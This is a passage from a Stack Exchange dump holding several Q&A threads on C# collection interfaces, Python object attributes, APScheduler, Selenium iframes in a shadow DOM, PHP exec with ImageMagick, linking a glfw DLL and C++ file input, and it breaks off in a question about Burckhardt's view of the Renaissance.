Layers any more. IMHO\nAnswer: <code>ICollection<T><\/code> is used because the <code>IEnumerable<T><\/code> interface provides no way of adding items, removing items, or otherwise modifying the collection.\nComment: `List` implements `ICollection`.\nComment: what about comparing against List?\nComment: The non-generic `ICollection` doesn't allow any way to add items, but it's still a useful adjunct to `IEnumerable` because it provides a `Count` member which is typically much faster than enumerating everything. Note that if an `IList` or `ICollection` is passed to code expecting an `IEnumerable`, the `Count()` extension method will be fast if it implements the non-generic `ICollection`, but not if it only implements the generic interfaces since a typical `ICollection` will not implement `ICollection`.\nAnswer: Responding to your question about <code>List<T><\/code>:\n<code>List<T><\/code> is a class; specifying an interface allows more flexibility of implementation. A better question is \"why not <code>IList<T><\/code>?\"\nTo answer that question, consider what <code>IList<T><\/code> adds to <code>ICollection<T><\/code>: integer indexing, which means the items have some arbitrary order, and can be retrieved by reference to that order. This is probably not meaningful in most cases, since items probably need to be ordered differently in different contexts.\nAnswer: There are some basics difference between ICollection and IEnumerable\n\nIEnumerable - contains only GetEnumerator method to get Enumerator and allows looping\nICollection contains additional methods: Add, Remove, Contains, Count, CopyTo\nICollection is inherited from IEnumerable\nWith ICollection you can modify the collection by using the methods like add\/remove. You don't have the liberty to do the same with IEnumerable.\n\nSimple Program:\n<code>using System;\nusing System.Collections;\nusing System.Collections.Generic;\n\nnamespace StackDemo\n{\n class Program \n {\n static void Main(string[] args)\n {\n List<Person> persons = new List<Person>();\n persons.Add(new Person(\"John\",30));\n persons.Add(new Person(\"Jack\", 27));\n\n ICollection<Person> personCollection = persons;\n IEnumerable<Person> personEnumeration = persons;\n\n \/\/ IEnumeration\n \/\/ IEnumration Contains only GetEnumerator method to get Enumerator and make a looping\n foreach (Person p in personEnumeration)\n { \n Console.WriteLine(\"Name:{0}, Age:{1}\", p.Name, p.Age);\n }\n\n \/\/ ICollection\n \/\/ ICollection Add\/Remove\/Contains\/Count\/CopyTo\n \/\/ ICollection is inherited from IEnumerable\n personCollection.Add(new Person(\"Tim\", 10));\n\n foreach (Person p in personCollection)\n {\n Console.WriteLine(\"Name:{0}, Age:{1}\", p.Name, p.Age); \n }\n Console.ReadLine();\n\n }\n }\n\n class Person\n {\n public string Name { get; set; }\n public int Age { get; set; }\n public Person(string name, int age)\n {\n this.Name = name;\n this.Age = age;\n }\n }\n}\n<\/code>\nAnswer: I remember it this way:\n\nIEnumerable has one method GetEnumerator() which allows one to read through the values in a collection but not write to it. Most of the complexity of using the enumerator is taken care of for us by the for each statement in C#. IEnumerable has one property: Current, which returns the current element.\nICollection implements IEnumerable and adds few additional properties the most use of which is Count. The generic version of ICollection implements the Add() and Remove() methods.\nIList implements both IEnumerable and ICollection, and add the integer indexing access to items (which is not usually required, as ordering is done in database).\nComment: Based on what you wrote ICollection and IList are the same. Please add what is added to IList that does not exist in ICollection.\nComment: ICollection VS IList, IList- only interface in the System.Collection that contains all functionality of IEnumerable and ICollection and additional functionality. IList has Insert and Remove methods. Both the methods accept index in their parameter. So, it supports index based operations over collection.\nAnswer: The basic idea of using <code>ICollection<\/code> is a provide an interface to readonly-access to some finite amount of data. In fact you have a ICollection.Count property. <code>IEnumerable<\/code> is more suitable for some chain of the data where you read till some logical point, some condition esplicitly specified by consumer or till the end of the enumeration.\nComment: TIL that [`ICollection`](http:\/\/msdn.microsoft.com\/en-us\/library\/System.Collections.ICollection%28v=vs.110%29.aspx) is read-only while [`ICollection`](http:\/\/msdn.microsoft.com\/en-us\/library\/c28hx0c4%28v=vs.110%29.aspx) is not.\nAnswer: What I have done in the past is declare my inner class collections using <code>IList<Class><\/code>, <code>ICollection<Class><\/code>or <code>IEnumerable<Class><\/code> (if static list) depending on whether or not I will have to do any number of the following in a method in my repository: enumerate, sort\/order or modify. When I just need to enumerate (and maybe sort) over objects then I create a temp <code>List<Class><\/code>to work with the collection within an IEnumerable method. I think this practice would only be effective if the collection is relatively small, but it may be good practice in general, idk. Please correct me if there is evidence as to why this would not good practice.\nAnswer: Navigation properties are typically defined as virtual so that they can take advantage of certain Entity Framework functionality such as lazy loading. \nIf a navigation property can hold multiple entities (as in many-to-many or one-to-many relationships), its type must be a list in which entries can be added, deleted, and updated, such as ICollection.\nhttps:\/\/www.asp.net\/mvc\/overview\/getting-started\/getting-started-with-ef-using-mvc\/creating-an-entity-framework-data-model-for-an-asp-net-mvc-application\nAnswer: Lets try thinking outside of the box with\/by logic and understand clearly these three interfaces in your question:\nWhen the class of some instance implements the System.Collection.IEnumerable interface then, in simple words, we can say that this instance is both enumerable and iterable, which means that this instance allows somehow in a single loop to go\/get\/pass\/traverse\/iterate over\/through all the items and elements that this instance contains.\nThis means that this is also possible to enumerate all the items and elements that this instance contains.\nEvery class that implements the System.Collection.IEnumerable interface also implements the GetEnumerator method that takes no arguments and returns an System.Collections.IEnumerator instance.\nInstances of System.Collections.IEnumerator interface behaves very similar to C++ iterators.\nWhen the class of some instance implements the System.Collection.ICollection interface then, in simple words, we can say that this instance is some collection of things.\nThe generic version of this interface, i.e. System.Collection.Generic.ICollection, is more informative because this generic interface explicitly states what is the type of the things in the collection.\nThis is all reasonable, rational, logical and makes sense that System.Collections.ICollection interface inherits from System.Collections.IEnumerable interface, because theoretically every collection is also both enumerable and iterable and this is theoretically possible to go over all the items and elements in every collection.\nSystem.Collections.ICollection interface represents a finite dynamic collection that are changeable, which means that exist items can be removed from the collection and new items can be added to the same collection.\nThis explains why System.Collections.ICollection interface has the \"Add\" and \"Remove\" methods.\nBecause that instances of System.Collections.ICollection interface are finite collections then the word \"finite\" implies that every collection of this interface always has a finite number of items and elements in it.\nThe property Count of System.Collections.ICollection interface supposes to return this number.\nSystem.Collections.IEnumerable interface does not have these methods and properties that System.Collections.ICollection interface has, because it does not make any sense that System.Collections.IEnumerable will have these methods and properties that System.Collections.ICollection interface has.\nThe logic also says that every instance that is both enumerable and iterable is not necessarily \na collection and not necessarily changeable.\nWhen I say changeable, I mean that don't immediately think that you can add or remove something from something that is both enumerable and iterable.\nIf I just created some finite sequence of prime numbers, for example, this finite sequence of prime numbers is indeed an instance of System.Collections.IEnumerable interface, because now I can go over all the prime numbers in this finite sequence in a single loop and do whatever I want to do with each of them, like printing each of them to the console window or screen, but this finite sequence of prime numbers is not an instance of System.Collections.ICollection interface, because this is not making sense to add composite numbers to this finite sequence of prime numbers.\nAlso you want in the next iteration to get the next closest larger prime number to the current prime number in the current iteration, if so you also don't want to remove exist prime numbers from this finite sequence of prime numbers.\nAlso you probably want to use, code and write \"yield return\" in the GetEnumerator method of the System.Collections.IEnumerable interface to produce the prime numbers and not allocating anything on the memory heap and then task the Garbage Collector (GC) to both deallocate and free this memory from the heap, because this is obviously both waste of operating system memory and decreases performance.\nDynamic memory allocation and deallocation on the heap should be done when invoking the methods and properties of System.Collections.ICollection interface, but not when invoking the methods and properties of System.Collections.IEnumerable interface (although System.Collections.IEnumerable interface has only 1 method and 0 properties).\nAccording to what others said in this Stack Overflow webpage, System.Collections.IList interface simply represents an orderable collection and this explains why the methods of System.Collections.IList interface work with indexes in contrast to these of System.Collections.ICollection interface.\nIn short System.Collections.ICollection interface does not imply that an instance of it is orderable, but System.Collections.IList interface does imply that.\nTheoretically ordered set is special case of unordered set.\nThis also makes sense and explains why System.Collections.IList interface inherits System.Collections.ICollection interface.\nAnswer: Googling brought me here, and I haven't seen anyone mention this yet. I just got bamboozled by an API that looks similar to the following:\n<code>void Load(object key)\nvoid Load(IEnumerable keys)\n<\/code>\nPassing in a string selects the <code>IEnumerable<\/code> overload, which is not what I (nor the API authors) intended. If the <code>IEnumerable<\/code> would have been an <code>ICollection<\/code> instead, then the <code>object<\/code> overload would have been selected for strings, which is the intention.\nJust something to think about when trying to express intent in APIs. I'd guess it's more common than not for people to use <code>IEnumerable<\/code> even when their intent is to treat the type as a collection and NOT include other types of enumerables (like <code>string<\/code>).\n","meta":{"source":"stackoverflow","title":"Why use ICollection and not IEnumerable or List on many-many\/one-many relationships?","dup_signals":{}},"subset":"stackexchange"} +{"text":"python object attributes and methods\n\nQuestion: In python all data is object and any object should have attributes and methods.\nDoes somebody know python object without any attributes and methods?\n<code>>>> len(dir(1))\n64\n<\/code>\nComment: yes just try it in python 2.7\nComment: Guys sorry, I tried it in Pycharm, it returns nothing, but when I tried it in IDLE, it returned a list of attributes and methods\nAnswer: This is easy to accomplish by overriding <code>__dir__<\/code> and <code>__getattribute__<\/code>:\n<code>class Empty(object):\n def __dir__(self):\n return []\n def __getattribute__(self, name):\n raise AttributeError(\"'{0}' object has no attribute '{1}'\".format(type(self).__name__, name))\n\ne = Empty()\ndir(e)\n[]\ne.__name__\nAttributeError: 'Empty' object has no attribute '__name__'\n<\/code>\n(In python2, <code>Empty<\/code> needs to be a new-style class, so the <code>class Empty(object):<\/code> is required; in python3 old-style classes are extinct so <code>class Empty:<\/code> is sufficient.)\nComment: @PauloScardine right, for Python2 you need to change it to `class Empty(object)`; I mentioned that right after the code.\nComment: @ecatmur: Wouldn't changing your answer to `class Empty(object):` make it work for both Python 2.2+ through 3.x?\nComment: `dir(x)` returning empty list doesn't means `x` has no attributes\/methods.\nComment: @PauloScardine you can override `__getattribute__` as well.\nComment: `e.__class__` results `__main__.Empty` even with your tricks.\nComment: @PauloScardine which version? http:\/\/ideone.com\/pcFfp `AttributeError: 'Empty' object has no attribute '__class__'` on everything I've tried.\nComment: `Python 2.7.2 (default, Jun 12 2011, 14:24:46) [MSC v.1500 64 bit (AMD64)]`\nComment: @PauloScardine http:\/\/ideone.com\/smVQh (have you forgotten to make it a new-style class?)\nComment: @martineau but it'd be *less elegant*... oh, fine, I'll change it. Cheers!\nComment: @ecatmur: +1 _Elegance_ is beholden to the eye. Some even think \"Explicit is better than implicit\".\nAnswer: Havn't came across any such object, which doesn;t have any attribute.. see below\n<code>In [74]: class dummy():\n ....: pass\n ....:\n\nIn [75]: d1 = dummy()\n\nIn [76]: dir(d1)\nOut[76]: ['__doc__', '__module__']\n\nIn [77]: len(dir(d1))\nOut[77]: 2\n<\/code>\neven None has attributes...\n<code>In [78]: dir(None)\nOut[78]:\n['__class__',\n '__delattr__',\n '__doc__',\n '__format__',\n '__getattribute__',\n '__hash__',\n '__init__',\n '__new__',\n '__reduce__',\n '__reduce_ex__',\n '__repr__',\n '__setattr__',\n '__sizeof__',\n '__str__',\n '__subclasshook__']\n<\/code>\nAnswer: Yes! (or no...)\n<code>def AMeta(name, bases, dct):\n class NoProp:\n pass\n del NoProp.__doc__\n del NoProp.__module__\n return NoProp\n\nclass A:\n __metaclass__ = AMeta\n\nprint dir(A), 'len', len(dir(A))\n\nprint\nprint 'but... A.__name__ is', A.__name__\nprint 'Delete it!'\ntry:\n del A.__name__\nexcept Exception as e:\n print 'Did not work: ', repr(e)\n\nprint\nprint 'and... A.__dict__ is', A.__dict__\nprint 'Delete it!'\ntry:\n del A.__dict__\nexcept Exception as e:\n print 'Did not work: ', repr(e)\n\nprint\nprint 'and... A.__bases__ is', A.__bases__\nprint 'Delete it!'\ntry:\n del A.__bases__\nexcept Exception as e:\n print 'Did not work: ', repr(e)\n\nprint \nprint 'What is the type of A?'\nt = type(A)\nprint t, 'which is a', type(t)\n\nprint \"All of these will raise an AttributeError:\"\nprint \"A.__class__, A.__module__, (and maybe some others which are usually there too...)\"\n<\/code>\nNormally, all objects have some attributes whatever these are. But when using metaclasses, you can customize the way the class is created, and there you have it.\nHowever, even if <code>dir<\/code> is empty, you can still access <code>A.__name__<\/code>, <code>A.__dict__<\/code>, <code>A.__bases__<\/code>.\nThis is what the tests I made gave me:\n<code>[] len 0\n\nbut... A.__name__ is NoProp\nDelete it!\nDid not work: TypeError('__name__ must be a string object',)\n\nand... A.__dict__ is {}\nDelete it!\nDid not work: TypeError('__dict__ must be a dictionary object',)\n\nand... A.__bases__ is ()\nDelete it!\nDid not work: TypeError('__bases__ must be a tuple object',)\n\nWhat is the type of A?\n<type 'classobj'> which is a <type 'type'>\nAll of these will raise an AttributeError:\nA.__class__, A.__module__, (and maybe some others which are usually there too...)\n<\/code>\nComment: so the answer is \"no\", even if dir(x) returns empty, x still has methods\/attributes.\nComment: @PauloScardine You're right, but that `A` class still passes his test. Doesn't it?\nComment: dir(len(1)) isn't the test. It's just visualization of question\nComment: What were you basing your facts on? What `dir` returned... Anyway, I added details, the answer is \"no\", but can *look* like \"yes\".\nAnswer: You can create an object without any \"public\" attributes and methods:\n<code>class Bare(object):\n pass\n<\/code>\nBut this object will have some internal\/standard methods and attributes:\n<code>>>> x = Bare()\n>>> dir(x)\n['__class__',\n '__delattr__',\n '__doc__',\n '__format__',\n '__getattribute__',\n '__hash__',\n '__init__',\n '__new__',\n '__reduce__',\n '__reduce_ex__',\n '__repr__',\n '__setattr__',\n '__sizeof__',\n '__str__',\n '__subclasshook__']\n<\/code>\nPython has no concept of enforced private methods and attributes, everything is exposed. However, by convention, you should avoid external access to methods and attributes beginning with <code>_<\/code>, these should be reserved for internal use (double underscores for Python internal methods). In practice you can check for an instance without any \"public\" attributes:\n<code>>>> filter(lambda a: a[0] != '_', dir(x))\n[]\n\n>>> len(filter(lambda a: a[0] != '_', dir(x)))\n0\n<\/code>\nEven if you cheat by overriding <code>__dir__<\/code> and <code>__getattribute__<\/code>, the built-in attributes are still there and can be accessed using <code>__getattribute__<\/code> from the parent class (thanks for martineau to point me this):\n<code>class FakeEmpty:\n def __dir__(self):\n return []\n def __getattribute__(self, name):\n raise AttributeError(\"'{0}' object has no attribute '{1}'\".format(type(self).__name__, name))\n\n>>> e = FakeEmpty()\n>>> object.__getattribute__(e, '__class__')\n__main__.Empty\n<\/code>\nSo the answer is: not really, but you can almost fake it. \nComment: you are inheriting from object class, the Bare class will have some attributes of object class\nComment: Indeed, you can declare \"old style\" classes that don't inherit from object, but should you do it in modern Python?\nComment: yes, new style class are very good, but my only point was, even in old style classes, object will have attributes :)\n","meta":{"source":"stackoverflow","title":"python object attributes and methods","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can we have a chat cast around a Designer?\n\nQuestion: Can we have chat casts with professional designers?\nFor example we pick a certain technique in photoshop or a certain element in design and we pick the brain of the designer for an hour (or a play by play of how that designer would go about it)?\nWould Jin (and other designers) be up for that?\nAnswer: I'd certainly be up for that. Given how very quiet the chat area generally is, it might give us a way to increase participation. If there's one thing lacking in the site currently -- it's inherent in the SE model, I think -- it's interaction. Time zones are a bit of a hurdle for real-time chat, but better something than nothing.\nIt would likely be more interesting and more useful if several designers participated in any given chat, rather than one. Everyone I know has his or her own way of approaching a given design challenge, and once you start talking Photoshop techniques, where there are a minimum of 10 ways to do almost anything, the more folks who are involved, the better.\nAnswer: I'd be happy to do this! I agree with Alan that it'd be nice to have multiple designers involved.\nAnswer: I bet if we ask nicely, we could get Jin, the SE designer, to do a chat with us. It could be a nice stepping stone. I'll ask around, see if we can get Jin in sometime. Anyone have a preference for what time to do it?\nComment: Speaking personally, which is the only way I know how to speak, after the New Year would be best. We're up to our ears in project deadlines until early January.\nComment: As for time, I prefer to avoid the 6 am to Noon (PST - UTC -8) time slot. Other than that I'm usually around, lo, even unto the wee hours. :)\n","meta":{"source":"graphicdesign.meta.stackexchange","title":"Can we have a chat cast around a Designer?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Python APScheduler, execute an interval between start_date and end_date\n\nQuestion: I have the following code snippet:\n<code>scheduler = TornadoScheduler()\nscheduler.add_job(tick2, 'interval', seconds=6)\n\nscheduler.start()\n<\/code>\nHow is it possible to configure a job to be executed on an interval of 5 seconds, but starting on date x at hour x1, and ending on date y at hour y2?\nFor example starting from 22th of Nov 14:30 and ending by 25th of November 23:00, it will execute a function every 5 seconds?\nThank you!\nAnswer: From <code>interval<\/code> trigger documentation, you can pass <code>start_date<\/code> and <code>end_date<\/code> as keyword arguments\nSo, your code should be\n<code>start_date = ... # can be string or datetime object\nend_date = ... # can be a string or a datetime object\nscheduler.add_job(tick2, 'interval', seconds=6, start_date=start_date, end_date=end_date)\n<\/code>\n","meta":{"source":"stackoverflow","title":"Python APScheduler, execute an interval between start_date and end_date","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why I cannot switch to Iframe on this website?\n\nQuestion: I am trying to switch to Iframe on this link https:\/\/www.walmart.com\/blocked but I cannot\n<code>driver.switch_to.frame(driver.find_element(By.CSS_SELECTOR, value='iframe'))\n<\/code>\ngives error\n<code>NoSuchElementException: Message: no such element: Unable to locate element: {\"method\":\"css selector\",\"selector\":\"iframe\"}\n<\/code>\nOr even if I try to do\n<code>driver.find_elements(driver.find_element(By.XPATH, value='\/\/iframe'))\n<\/code>\nI get error\n<code>InvalidSelectorException: Message: invalid selector: The result of the xpath expression \"\/\/iframe\" is: [object HTMLIFrameElement]. It should be an element.\n<\/code>\nAnswer: In the link which you shared, iframe tag is inside 'Shadow DOM', which is why selenium throws exception\nTry with JavaScript executor to access the web element in chrome, it will work.\nFor more details please do refer Handle Shadow DOM\nAnswer: The <code>iframes<\/code> are inside a shadow-root there. \nComment: is there way to access them via Python Selenium?\nComment: Sure, there are a lot of questions about it here. Personally I never had this on the work, but I saw such questions here.\n","meta":{"source":"stackoverflow","title":"Why I cannot switch to Iframe on this website?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Imagemagick PDF to JPG - execute well but don't create file\n\nQuestion: I am trying to convert PDF to JPG file with this code:\n<code>$pdf_file = 'text.pdf';\n$save_to = 'demo.jpg'; \/\/make sure that apache has permissions to write in this folder! (common problem)\n\/\/execute ImageMagick command 'convert' and convert PDF to JPG with applied settings\nexec('convert '.$pdf_file.' '.$save_to, $output, $return_var);\n\nif($return_var == 0) { \/\/if exec successfuly converted pdf to jpg\nprint \"Conversion OK\";\n}\nelse print \"Conversion failed.<br \/>\".$output;\n<\/code>\nAnd I get message Conversion OK but image file don't creates. When I tried this on the different server, then everything works. \nPermissions for root catalog are set to 777. I don't have any idea why it doesn't work... I don't know which versions of Imagemagick are installed on both servers. Maybe that is the problem ? In phpinfo() there is no information about version or anything.\nComment: Does the conversion work ok if executed on command line level?\nComment: You could verify the convert version and that it runs correctly with `exec('convert --version',$output); var_dump($output);`\nComment: One more thing. After I turned on the exec function i had to change `'convert '` to `'\/usr\/bin\/convert '`. Maybe this will help someone\nComment: Did you check if you have ghostscript installed on your machine\nAnswer: You are having trouble running \"convert\" because the PHP function exec() has been disabled in your php.ini file. \nWhen a exec() command is failing there are multiple steps that can be taken to troubleshoot the problem:\n\nVerify if safe mode is on. Specifically the docs say:\n\nNote: When safe mode is enabled, you can only execute files within the\n safe_mode_exec_dir. For practical reasons, it is currently not allowed\n to have .. components in the path to the executable.\n\nTurn on Error Reporting too see if that gives any more information. This can be accomplished by adding code like the following to the top of your script:\n<code>ini_set('display_errors', 1);\nini_set('error_reporting', E_ALL);\n<\/code>\nSimplify the exec() command to something that should always work:\n<code>exec('\/bin\/echo helloWorld',$output);\nvar_dump($output);\n<\/code>\n\nIn your specific case when you tried step #3 above, it returned null. Null is what PHP returns when the exec() function is disabled. Also, if you were able to turn on error reporting (step #2) the output would have looked something like the following:\n<code>PHP Warning: exec() has been disabled for security reasons in \/home\/path\/to\/file.php on line 2\nNULL\n<\/code>\nThe solution to this problem is to enable the exec function in php.ini or go to a host\/server that allows the function to be used.\nComment: Yes, you're right. When I add the code from second point, I got error that exec() is disabled. I also saw that in phpinfo there is section: disable_functions and there is shown the exec function. Thanks a lot\nAnswer: Try explicit error reporting: <code>error_reporting(E_ALL)<\/code>, maybe it gives warnings about exec permissions.\nAlso: With \"Permissions for root catalog\" you mean the folder from where you are executing and saving the files?\nComment: Yes, I didn't precise. The folder and all files that are in this folder have 777.\nThe error_reporting gives nothing.\nAnswer: Is safe mode enabled on the server?\nWhen safe mode is enabled, you can only execute files within the \n\nsafe_mode_exec_dir\n\nSee here for additional information:\nhttp:\/\/www.php.net\/manual\/en\/ini.sect.safe-mode.php#ini.safe-mode-exec-dir\nComment: A pity. It would have been such a nice solution. ;o)\n","meta":{"source":"stackoverflow","title":"Imagemagick PDF to JPG - execute well but don't create file","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it possible to include a .dll in a c++ compile\n\nQuestion: Hey so I'm using vscode as my IDE and I was wondering if it was possible to include the dll for glfw3 into my build as whenever I run the finished program I need the glfw3.dll in the same folder as the .exe for it to run. Does anybody know how I would add it and if it is even possible.\nAlso here is my .vscode tasks.json\n<code> {\n \"type\": \"cppbuild\",\n \"label\": \"C\/C++: g++.exe build active file\",\n \"command\": \"C:\\\\msys64\\\\mingw64\\\\bin\\\\g++.exe\",\n \"args\": [\n \"-fdiagnostics-color=always\",\n \"-static\",\n \"-g\",\n \"-std=c++17\",\n \"${file}\",\n \"-I\",\n \".\/include\",\n \"-L\",\n \".\/lib\",\n \"-lopengl32\",\n \"-lglew32\",\n \"-lglfw3dll\",\n \"-Wl,--subsystem,windows\",\n \"-o\",\n \"${fileDirname}\\\\${fileBasenameNoExtension}.exe\" \n ],\n \"options\": {\n \"cwd\": \"${fileDirname}\"\n },\n \"problemMatcher\": [\n \"$gcc\"\n ],\n \"group\": {\n \"kind\": \"build\",\n \"isDefault\": true\n },\n \"detail\": \"compiler: C:\\\\msys64\\\\mingw64\\\\bin\\\\g++.exe\"\n }\n<\/code>\nComment: You need to use a _post-build command_. I have no experience doing it in vscode. Maybe this link will help: https:\/\/www.codeproject.com\/Questions\/1276983\/How-to-implement-pre-post-build-event-in-VS-code.\nComment: DLLs are usually searched within environment variable PATH\nAnswer: You can use a build event to copy the DLL into your exe target directory or put the DLL in your PATH environment variable.\n","meta":{"source":"stackoverflow","title":"Is it possible to include a .dll in a c++ compile","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I prompt user many time for different filenames using a for loop?\n\nQuestion: I'm trying to open and read user input files with my C++ program.\nMy program has 2 functions; <code>Open_Read()<\/code> and <code>Enter_Filename()<\/code>.\nThe <code>Enter_Filename<\/code> asks the user to enter input filenames (from 1 to 4).\nThe function <code>Open_Read<\/code> opens and reads the content of the file and displays it. \nWhen <code>nb = 1<\/code> (1 <= nb <=4) the program works, but from <code>nb >=2<\/code> the program cannot open file (or cannot find the file).\nCan someone help me find the problem? \n<code>#include <iostream>\n#include <fstream>\n\nusing Namespace std;\n\nvoid Enter_Filename(const int& m, int& nb, char name[], double yy[], double xx[]);\nvoid Open_Read(ifstream&, char filename[], char name[], double yy[], double xx[], int &n, double &sd, char set1[]);\n\ndouble y[256], x[256];\n\nint main()\n{ \n ifstream in;\n char filename[7];\n char name[7];\n char set1[20];\n double yy[4];\n double xx[4];\n int n = 0;\n double sd = 0;\n int nb;\n int m = 4;\n\n Enter_Filename(m, nb, filename, &yy[4], &xx[4]);\n\nfor (int i = 1; i <= nb; i++)\n {\n Open_Read(in, &filename[i], &name[i], &yy[i], &xx[i], n, sd, &set1[i]);\n }\n\n cout << \"\\n\";\n system(\"PAUSE\");\n\n return 0;\n}\n<\/code>\nHere the function <code>Enter_Filename<\/code>:\n<code> void Enter_Filename(const int& m, int& nb, char name[], double yy[], double xx[])\n {\n cout << \"Please Enter the number of articles (1 <= nb <= 4)\\n\"\n \"Nb =\";\n cin >> nb;\n\n if (nb <= m)\n {\n for (int j = 1; j <= nb; j++)\n {\n cout << j << \".Article (e.g. input.txt, input1.txt...) =\";\n cin >> &name[j];\n cout << \"yy(\" << j << \") =\";\n cin >> yy[j];\n cout << \"xx(\" << j << \") =\";\n cin >> xx[j];\n }\n }\n }\n<\/code>\nAnd the function <code>Open_Read<\/code>:\n<code>void Open_Read(ifstream&, char filename[], char name[], double yy[], double xx[], int& n, double &sd, char set1[])\n{\n\n ifstream inf;\n\n \/\/cout << \"Enter the file name to be opened: \";\n\n \/\/cin >> fileName;\n\n inf.open(filename, ios::in);\n\n if (inf.fail())\n {\n cout << \"Opening \" << filename << \" file for reading\\n\";\n cout << \"---------------------------------------\\n\";\n cout << \"The \" << filename << \" file could not be opened!\\n\";\n cout << \"Possible errors:\\n\";\n cout << \"1. The file does not exist.\\n\";\n cout << \"2. The path was not found.\\n\";\n exit(1); \n }\n else\n {\n cout << \"fileName:\" << filename << endl;\n inf >> name >> set1;\n inf.ignore(numeric_limits<streamsize>::max(), '\\n');\n inf >> n >> sd;\n\n for (int i = 1; i <= n; i++)\n {\n inf >> y[i] >> x[i];\n\n printf(\"%3i: %10.3f %10.3f\\n\", i, y[i], x[i]);\n\n }\n\n y[0] = *yy;\n x[0] = x[0] + *xx;\n\n for (int i = 1; i <= n; i++)\n {\n y[i] = y[i - 1] + y[i];\n x[i] = x[i] + *xx;\n }\n }\n\n inf.close();\n\n cout << \"NAME:\" << name << endl;\n cout << \"SetID:\" << set1 << endl;\n cout << \"N =\" << n << endl;\n cout << \"SubD =\" << sd << endl;\n\n if (inf.fail())\n {\n cout << \"\\nThe file \" << filename << \" could not be closed!\\n\";\n exit(1);\n }\n return;\n}\n<\/code>\nI use two files: <code>input.txt<\/code> and <code>input1.txt<\/code>:\n<code> input.txt\n\n INPUT.TXT\n 1S12-111-433-3245 K\n 5 12.0000\n 0.000 12.290\n 1.840 0.170\n 1.480 6.190\n 1.220 17.100 \n 1.040 25.000\n\n input1.txt\n\n INPUT1.TXT\n 1S12-111-533-3245 P\n 3 12.0000\n .000 11.780\n 0.150 34.820\n 1.840 24.810\n<\/code>\nComment: `char filename[7];` can't hold multiple filenames. You probably meant to have something like `std::string filename[7];`\nComment: You should improve your indentation.\nComment: `Function1()` is a very bad name for _any_ function.\nComment: Your code indentation was really awful. You can't be a good programmer, if you are not able to do such elementary thing like the code indentation and style.\nComment: @mch thanks, i will do it.\nComment: @Dawid Ferenczy there is always a beginning to everything\nAnswer: This is a working version of your application:\n<code>#include \"stdafx.h\"\n#include <iostream>\n#include <fstream>\n#include <iosfwd>\n\nusing namespace std;\nvoid Enter_Filename(const int& m, int& nb, char name[], double yy[], double xx[], int j);\nvoid Open_Read(ifstream&, char filename[], char name[], double yy[], double xx[], int &n, double &sd, char set1[]);\n\ndouble y[256], x[256];\n\nint main()\n{\n ifstream in;\n char filename[4][10];\n\n char name[7];\n char set1[20];\n double yy[4];\n double xx[4];\n int n = 0;\n double sd = 0;\n int nb;\n int m = 4;\n\n cout << \"Please Enter the number of articles (1 <= nb <= 4)\\n\"\n \"Nb =\";\n cin >> nb;\n\n if (nb <= m)\n {\n for (int j = 0; j < nb; j++)\n {\n Enter_Filename(m, nb, filename[j], &yy[4], &xx[4], j);\n }\n }\n\n for (int i = 0; i < nb; i++)\n {\n Open_Read(in, filename[i], &name[i], &yy[i], &xx[i], n, sd, &set1[i]);\n }\n\n cout << \"\\n\";\n system(\"PAUSE\");\n\n return 0;\n}\n\nvoid Enter_Filename(const int& m, int& nb, char name[], double yy[], double xx[], int j)\n{\n\n cout << j << \".Article (e.g. input.txt, input1.txt...) =\";\n cin >> &name[0];\n cout << \"yy(\" << j << \") =\";\n cin >> yy[j];\n cout << \"xx(\" << j << \") =\";\n cin >> xx[j];\n\n}\n\nvoid Open_Read(ifstream&, char filenames[], char name[], double yy[], double xx[], int& n, double &sd, char set1[])\n{\n\n ifstream inf;\n\n \/\/cout << \"Enter the file name to be opened: \";\n\n \/\/cin >> fileName;\n char filename[11];\n memcpy(filename, filenames, 11);\n filename[10] = '\\0';\n\n inf.open(filename, ios::in);\n\n if (inf.fail())\n {\n cout << \"Opening \" << filename << \" file for reading\\n\";\n cout << \"---------------------------------------\\n\";\n cout << \"The \" << filename << \" file could not be opened!\\n\";\n cout << \"Possible errors:\\n\";\n cout << \"1. The file does not exist.\\n\";\n cout << \"2. The path was not found.\\n\";\n exit(1);\n }\n else\n {\n cout << \"fileName:\" << filename << endl;\n inf >> name >> set1;\n inf.ignore(numeric_limits<streamsize>::max(), '\\n');\n inf >> n >> sd;\n\n for (int i = 1; i <= n; i++)\n {\n inf >> y[i] >> x[i];\n\n printf(\"%3i: %10.3f %10.3f\\n\", i, y[i], x[i]);\n\n }\n\n y[0] = *yy;\n x[0] = x[0] + *xx;\n\n for (int i = 1; i <= n; i++)\n {\n y[i] = y[i - 1] + y[i];\n x[i] = x[i] + *xx;\n }\n }\n\n inf.close();\n\n cout << \"NAME:\" << name << endl;\n cout << \"SetID:\" << set1 << endl;\n cout << \"N =\" << n << endl;\n cout << \"SubD =\" << sd << endl;\n\n if (inf.fail())\n {\n cout << \"\\nThe file \" << filename << \" could not be closed!\\n\";\n exit(1);\n }\n return;\n}\n<\/code>\nI did not control what was coming out from your calculations, i only ensured that now it opens your files \nComment: i think you' re right, but with char filename[4][7] i have some difficulties to open a file using fstream\nComment: if 'filename' in inf.open(filename, ios::in); needs to be a char[] , then there will be no problems\nComment: inf.open(filename, ios::in) ; i tried several times but it did not work , i have the error c2664: cannot convert parameter 1 from 'char [][7] ' to ' const wchar_t*'\nComment: use Filename.c_str() instead of Filename in the call of ifstream::open\nComment: filename.c_str() does not work with char filename[4][7], not even with string filename[4][7]. But with string filename only\nComment: I edited the post with a working version of your code.\nComment: Good, can you please up my answer +1. tnx\nComment: it's done, it will appear when I reach 15 reputations\n","meta":{"source":"stackoverflow","title":"How can I prompt user many time for different filenames using a for loop?","dup_signals":{}},"subset":"stackexchange"} +{"text":"What did Jacob Burckhardt intend to say by 'turn within' and 'turn without'?\n\nQuestion: Source: The Well-Educated Mind (2 edn 2016), pp. 230-231.\n\nIt is to Jacob Burckhardt that we owe the popular conception of the \n Renaissance as the time when man began to be modern. Burckhardt writes, \"In the Middle Ages both sides of human consciousness\u2014that \n which was turned within as that which was turned without\u2014lay dreaming or half awake beneath a common veil. The veil was woven of faith, \n illusion, and childish prepossession, through which the world and history \n were seen clad in strange hues. Man was conscious of himself only as \n member of a race, people, party, family, or corporation\u2014only through \n some general category. In Italy this veil first melted into air: an objective \n treatment and consideration of the State and of all the things in this 